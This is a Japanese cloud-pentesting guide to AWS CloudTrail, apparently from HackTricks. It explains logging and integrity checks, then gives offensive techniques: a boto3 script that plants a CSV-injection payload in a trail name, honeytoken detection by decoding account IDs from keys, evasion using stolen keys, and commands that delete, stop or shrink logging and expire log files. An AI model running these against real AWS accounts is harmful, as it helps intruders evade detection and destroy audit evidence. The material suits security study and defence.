AWS - CloudTrail Enum

CloudTrail

AWS CloudTrail は、AWS環境内のアクティビティを記録および監視します。それは、誰が何を、いつ、どこから行ったかを含む詳細なイベントログをキャプチャします。これにより、変更やアクションの監査証跡が提供され、セキュリティ分析、コンプライアンス監査、およびリソース変更の追跡に役立ちます。CloudTrailは、ユーザーとリソースの動作を理解し、セキュリティ姿勢を強化し、規制遵守を確保するために不可欠です。

各ログイベントには以下が含まれます：

• 呼び出されたAPIの名前: eventName

• 呼び出されたサービス: eventSource

• 時間: eventTime

• IPアドレス: SourceIPAddress

• エージェントメソッド: userAgent。例：

• Signing.amazonaws.com - AWS Management Consoleから

• console.amazonaws.com - アカウントのルートユーザー

• lambda.amazonaws.com - AWS Lambda

• リクエストパラメータ: requestParameters

• レスポンス要素: responseElements

イベントは約5分ごとにJSONファイルに新しいログファイルとして書き込まれ、CloudTrailによって保持され、最終的にログファイルは約15分後にS3に配信されます。 CloudTrailのログはアカウント間およびリージョン間で集約できます。 CloudTrailは、ログファイルの整合性を使用して、CloudTrailがあなたに配信して以来、ログファイルが変更されていないことを確認できるようにします。それは、ダイジェストファイル内のログのSHA-256ハッシュを作成します。新しいログのsha-256ハッシュは毎時作成されます。 トレイルを作成する際、イベントセレクターを使用して、ログを記録するトレイルを示すことができます：管理、データ、またはインサイトイベント。

ログはS3バケットに保存されます。デフォルトではサーバーサイド暗号化（SSE-S3）が使用されるため、AWSはアクセス権を持つ人々のためにコンテンツを復号化しますが、追加のセキュリティのためにSSEをKMSと自分のキーで使用することもできます。

ログはこの名前形式のS3バケットに保存されます：

• BucketName/AWSLogs/AccountID/CloudTrail/RegionName/YYY/MM/DD

• バケット名は：aws-cloudtrail-logs-<accountid>-<random>

• 例：aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/

各フォルダ内の各ログはこの形式に従った名前を持ちます：AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz

ログファイル命名規則

さらに、ファイル整合性を確認するためのダイジェストファイルは、同じバケット内にあります：

複数アカウントからのログの集約

• ログファイルを配信するAWSアカウントでトレイルを作成します

• CloudTrailのためにクロスアカウントアクセスを許可するように、宛先S3バケットに権限を適用し、アクセスが必要な各AWSアカウントを許可します

• 他のAWSアカウントで新しいトレイルを作成し、ステップ1で作成したバケットを使用するように選択します

ただし、すべてのログを同じS3バケットに保存できるとしても、複数のアカウントからのCloudTrailログを単一のAWSアカウントに属するCloudWatch Logsに集約することはできません。

すべての組織アカウントから1つへのCloudTrail

CloudTrailを作成する際、組織内のすべてのアカウントに対してCloudTrailを有効にし、ログを1つのバケットに取得するように指示することが可能です：

この方法で、すべてのアカウントのすべてのリージョンでCloudTrailを簡単に構成し、1つのアカウントにログを集中させることができます（そのアカウントは保護する必要があります）。

ログファイルの確認

ログが変更されていないことを確認するには、次のコマンドを実行します

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

Logs to CloudWatch

CloudTrailは自動的にログをCloudWatchに送信できるため、疑わしい活動が行われたときに警告するアラートを設定できます。 CloudTrailがCloudWatchにログを送信できるようにするには、そのアクションを許可するロールを作成する必要があります。可能であれば、これらのアクションを実行するためにAWSのデフォルトロールを使用することをお勧めします。このロールはCloudTrailに以下を許可します：

• CreateLogStream: CloudWatch Logsのログストリームを作成することを許可します

• PutLogEvents: CloudTrailログをCloudWatch Logsのログストリームに配信します

Event History

CloudTrail Event Historyでは、記録されたログをテーブルで検査できます：

Insights

CloudTrail Insightsは自動的に管理イベントの書き込みを分析し、異常な活動を警告します。例えば、TerminateInstanceイベントの増加が確立されたベースラインと異なる場合、それはInsightイベントとして表示されます。これらのイベントは異常なAPI活動を見つけて対応することをこれまで以上に容易にします。

インサイトはCloudTrailログと同じバケットに保存されます：BucketName/AWSLogs/AccountID/CloudTrail-Insight

Security

Access Advisor

AWS Access Advisorは、過去400日間のAWS CloudTrailログを利用してインサイトを収集します。CloudTrailはAWSアカウント内で行われたAWS APIコールと関連イベントの履歴をキャプチャします。Access Advisorはこのデータを利用してサービスが最後にアクセスされた時期を表示します。CloudTrailログを分析することで、Access AdvisorはIAMユーザーまたはロールがアクセスしたAWSサービスとそのアクセスが行われた時期を特定できます。これにより、AWS管理者は権限の精緻化に関する情報に基づいた意思決定を行うことができ、長期間アクセスされていないサービスを特定し、実際の使用パターンに基づいて過度に広範な権限を削減することができます。

Actions

Enumeration

# Get trails info
aws cloudtrail list-trails
aws cloudtrail describe-trails
aws cloudtrail list-public-keys
aws cloudtrail get-event-selectors --trail-name <trail_name>
aws [--region us-east-1] cloudtrail get-trail-status --name [default]

# Get insights
aws cloudtrail get-insight-selectors --trail-name <trail_name>

# Get data store info
aws cloudtrail list-event-data-stores
aws cloudtrail list-queries --event-data-store <data-source>
aws cloudtrail get-query-results --event-data-store <data-source> --query-id <id>

CSVインジェクション

CloudTrail内でCSVインジェクションを実行することが可能で、ログがCSV形式でエクスポートされ、Excelで開かれると任意のコードが実行されます。 次のコードは、ペイロードを含む悪いトレイル名のログエントリを生成します：

import boto3
payload = "=cmd|'/C calc'|''"
client = boto3.client('cloudtrail')
response = client.create_trail(
Name=payload,
S3BucketName="random"
)
print(response)

For more information about CSV Injections check the page:

Formula InjectionHackTricks

For more information about this specific technique check https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/

バイパス検出

HoneyTokens バイパス

Honeytokensは機密情報の流出を検出するために作成されます。AWSの場合、これらは使用が監視されるAWSキーです。そのキーでアクションがトリガーされると、誰かがそのキーを盗んだに違いありません。

しかし、Canarytokens、 SpaceCrab、 SpaceSirenによって作成されたHoneytokensは、認識可能なアカウント名を使用するか、すべての顧客に対して同じAWSアカウントIDを使用しています。したがって、Cloudtrailにログを作成させることなくアカウント名やアカウントIDを取得できれば、そのキーがHoneytokenかどうかを知ることができます。

Pacuには、キーがCanarytokens、 SpaceCrab、 SpaceSirenに属するかどうかを検出するためのいくつかのルールがあります：

• **canarytokens.org**がロール名に表示されるか、アカウントID **534261010715**がエラーメッセージに表示される場合。

• 最近テストしたところ、彼らはアカウント**717712589309を使用しており、名前にcanarytokens.com**の文字列がまだ含まれています。

• エラーメッセージのロール名に**SpaceCrab**が表示される場合。

• SpaceSirenはユーザー名を生成するためにuuidsを使用します：[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}

• 名前がランダムに生成されたように見える場合、高い確率でそれはHoneyTokenです。

キーIDからアカウントIDを取得する

アクセスキー内のエンコードされた情報からアカウントIDを取得でき、ここで説明されているようにそのアカウントIDをHoneytokens AWSアカウントのリストと照合できます：

import base64
import binascii

def AWSAccount_from_AWSKeyID(AWSKeyID):

trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix
x = base64.b32decode(trimmed_AWSKeyID) #base32 decode
y = x[0:6]

z = int.from_bytes(y, byteorder='big', signed=False)
mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False)

e = (z & mask)>>7
return (e)

print("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML")))

Check more information in the orginal research.

ログを生成しない

これに対する最も効果的な手法は実際にはシンプルです。見つけたキーを使って、自分の攻撃者アカウント内のサービスにアクセスします。これにより、CloudTrailはあなた自身のAWSアカウント内にログを生成し、被害者のアカウント内には生成しません。

問題は、出力にアカウントIDとアカウント名を示すエラーが表示されるため、それがハニートークンかどうかを確認できることです。

ログなしのAWSサービス

過去には、CloudTrailにログを送信しないAWSサービスがいくつかありました（こちらにリストがあります）。これらのサービスのいくつかは、無許可の者（ハニートークンキー）がアクセスしようとすると、キー役割のARNを含むエラーで応答します。

このようにして、攻撃者はログをトリガーすることなくキーのARNを取得できます。ARNにはAWSアカウントIDと名前が表示されるため、ハニートークンの企業アカウントIDと名前を知るのは簡単で、これにより攻撃者はトークンがハニートークンかどうかを特定できます。

第三者インフラへのアクセス

特定のAWSサービスは、データベースやKubernetesクラスター（EKS）などのインフラを生成します。ユーザーがこれらのサービス（Kubernetes APIなど）に直接話しかける場合、AWS APIを使用しないため、CloudTrailはこの通信を確認できません。

したがって、EKSにアクセスできるユーザーがEKS APIのURLを発見した場合、ローカルでトークンを生成し、CloudTrailに検出されることなくAPIサービスに直接話しかけることができます。

詳細は以下を参照してください：

CloudTrail設定の変更

トレイルの削除

aws cloudtrail delete-trail --name [trail-name]

トレイルを停止する

aws cloudtrail stop-logging --name [trail-name]

マルチリージョンログを無効にする

aws cloudtrail update-trail --name [trail-name] --no-is-multi-region --no-include-global-services

イベントセレクタによるログの無効化

# Leave only the ReadOnly selector
aws cloudtrail put-event-selectors --trail-name <trail_name> --event-selectors '[{"ReadWriteType": "ReadOnly"}]' --region <region>

# Remove all selectors (stop Insights)
aws cloudtrail put-event-selectors --trail-name <trail_name> --event-selectors '[]' --region <region>

最初の例では、単一のイベントセレクターが単一のオブジェクトを持つJSON配列として提供されています。"ReadWriteType": "ReadOnly"は、イベントセレクターが読み取り専用イベントのみをキャプチャするべきであることを示しています（したがって、CloudTrailのインサイトは書き込みイベントをチェックしません）。

特定の要件に基づいてイベントセレクターをカスタマイズできます。

S3ライフサイクルポリシーによるログの削除

aws s3api put-bucket-lifecycle --bucket <bucket_name> --lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}' --region <region>

バケット設定の変更

• S3バケットを削除する

• CloudTrailサービスからの書き込みを拒否するようにバケットポリシーを変更する

• オブジェクトを削除するためにS3バケットにライフサイクルポリシーを追加する

• CloudTrailログを暗号化するために使用されるKMSキーを無効にする

CloudTrailランサムウェア

S3ランサムウェア

非対称鍵を生成し、CloudTrailにその鍵でデータを暗号化させ、秘密鍵を削除することで、CloudTrailの内容を回復できなくすることができます。 これは基本的にS3-KMSランサムウェアで、以下に説明されています：

KMSランサムウェア

これは、異なる権限要件で前述の攻撃を実行する最も簡単な方法です：

参考文献

• https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory